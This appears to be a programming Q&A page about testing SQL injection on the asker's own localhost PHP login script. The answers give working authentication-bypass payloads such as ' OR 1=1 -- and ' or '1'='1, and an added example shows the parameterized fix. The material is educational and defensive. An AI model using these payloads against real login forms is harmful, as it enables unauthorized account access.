mysql - Security PHP login SQL injection

I want to try SQL injection on this login script on my localhost, but I don't know how. The database has three columns: id, nameUser, passwordUser. Or do I need to create some other script which is insecure against injection?
Thanks for your advice.

if (isset($_POST['sent'])) {
    $nameUser = $_POST["name_User"];
    $passwordUser = $_POST["password_User"];
    $heslo = hash('sha512', $passwordUser);

    $dotaz = $spojeni->query("select * from uzivatele where nameUser = '$nameUser' and passwordUser = '$heslo'");
    $result = mysqli_num_rows($dotaz);
    $row = mysqli_fetch_array($dotaz);
    if ($result == 1) {
        echo "You are log in";
        die();
    } else {
        echo "badlogin";
        exit();
    }
}

Answer

Solution:

To sign in as john (assuming it's a valid user) you can convert this:

select * from uzivatele where nameUser = '$nameUser' and passwordUser = '$heslo'
                                          ^^^^^^^^^

... into this:

select * from uzivatele where nameUser = 'john' -- ' and passwordUser = '$heslo'
                                          ^^^^^^^^^

... by setting $_POST["name_User"] equal to the underlined code. The password condition is completely ignored because it's now inside a comment.

If you don't want to impersonate someone but just sign in with any random user, you only need to ensure that the final query returns exactly one row, e.g.:

select * from uzivatele where nameUser = '' OR 1=1 LIMIT 1 -- ' and passwordUser = '$heslo'
                                          ^^^^^^^^^^^^^^^^^^^^

Answer

Solution:

NOTE:

I try everything ' OR 1=1 ' OR id = 1--...but don't work.

In your question you are using both Procedural and Object Orientated PHP MySQL interactions, which will not work and will give you various script errors. You need to use one or the other, these two things do not interact with each other!


My Answer

Strings in MySQL are encased in single quotes so you need to close off the string early, and then add any MySQL command you want to on the end before finally tidying up so you do not cause a syntax error in the original SQL statement (although from an injection point of view syntax errors can be beneficial in seeing just how vulnerable SQL queries are, as people with these vulnerabilities often output their errors to screen rather than log files, etc.):

Part 1:

Close the input string early: x'

Part 2:

Carry on the SQL statement adding your own instructions but not causing a syntax error (part 3).

Typically using numbers: OR 1=1 (will always be true)

Part 3: preventing a syntax error.

-- or # (start comment), or appending the SQL so that the full SQL query is syntactically correct (injection string finishes with an open string): nameUser = 'z

So your input username string can now be:

x' OR 1=1 OR nameUser='z

giving your SQL:

select * from uzivatele where nameUser = 'x' OR 1=1 OR nameUser='z' 
 and passwordUser = ''

Or alternatively using comments:

x' OR 1=1 -- 

select * from uzivatele where nameUser = 'x' OR 1=1 -- ' and passwordUser = ''

Answer

Solution:

' or '1'='1

If above is entered as username and password this will do what you are trying to achieve.

So query will get modified like:

SELECT * FROM uzivatele WHERE nameUser='' or '1'='1' AND passwordUser='' or '1'='1';

It's looking for each to be true, as 1 will always equal 1.
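
The question's query next to a parameterized form, run against the user-name inputs quoted in the answers above. This is an added example, not code from the question or from any of the answers. It assumes PDO with an in-memory SQLite database in place of the MySQL connection, and the function names and sample users are constructed for illustration.

```php
<?php
// Added example, not code from the question or the answers.
// Assumption: PDO with in-memory SQLite stands in for the MySQL connection.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE uzivatele (id INTEGER PRIMARY KEY, nameUser TEXT, passwordUser TEXT)");

// Constructed sample users; hashing kept as in the question (sha512).
$ins = $db->prepare("INSERT INTO uzivatele (nameUser, passwordUser) VALUES (?, ?)");
$ins->execute(['john', hash('sha512', 'correct horse')]);
$ins->execute(['mary', hash('sha512', 'battery staple')]);

// The question's query: both values are pasted into the SQL text.
function loginConcatenated(PDO $db, string $name, string $password): bool
{
    $heslo = hash('sha512', $password);
    $sql = "select * from uzivatele where nameUser = '$name' and passwordUser = '$heslo'";
    return count($db->query($sql)->fetchAll()) === 1;
}

// Hardened form: the name is bound as data, so quotes and comment markers in it
// never reach the SQL parser; the hash is compared in PHP.
function loginPrepared(PDO $db, string $name, string $password): bool
{
    $stmt = $db->prepare("SELECT passwordUser FROM uzivatele WHERE nameUser = ?");
    $stmt->execute([$name]);
    $stored = $stmt->fetchColumn();
    return is_string($stored) && hash_equals($stored, hash('sha512', $password));
}

// Valid and invalid logins, then the user-name inputs quoted in the answers.
$attempts = [
    ['john', 'correct horse'],
    ['john', 'wrong password'],
    ["john' -- ", 'x'],
    ["' OR 1=1 LIMIT 1 -- ", 'x'],
    ["x' OR 1=1 OR nameUser='z", 'x'],
    ["' or '1'='1", "' or '1'='1"],
];
foreach ($attempts as [$name, $password]) {
    printf("%-28s concatenated=%-5s prepared=%s\n",
        json_encode($name),
        var_export(loginConcatenated($db, $name, $password), true),
        var_export(loginPrepared($db, $name, $password), true));
}
```

With the mysqli connection from the question, the same binding is done with `$spojeni->prepare()` followed by `bind_param()` and `execute()`.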
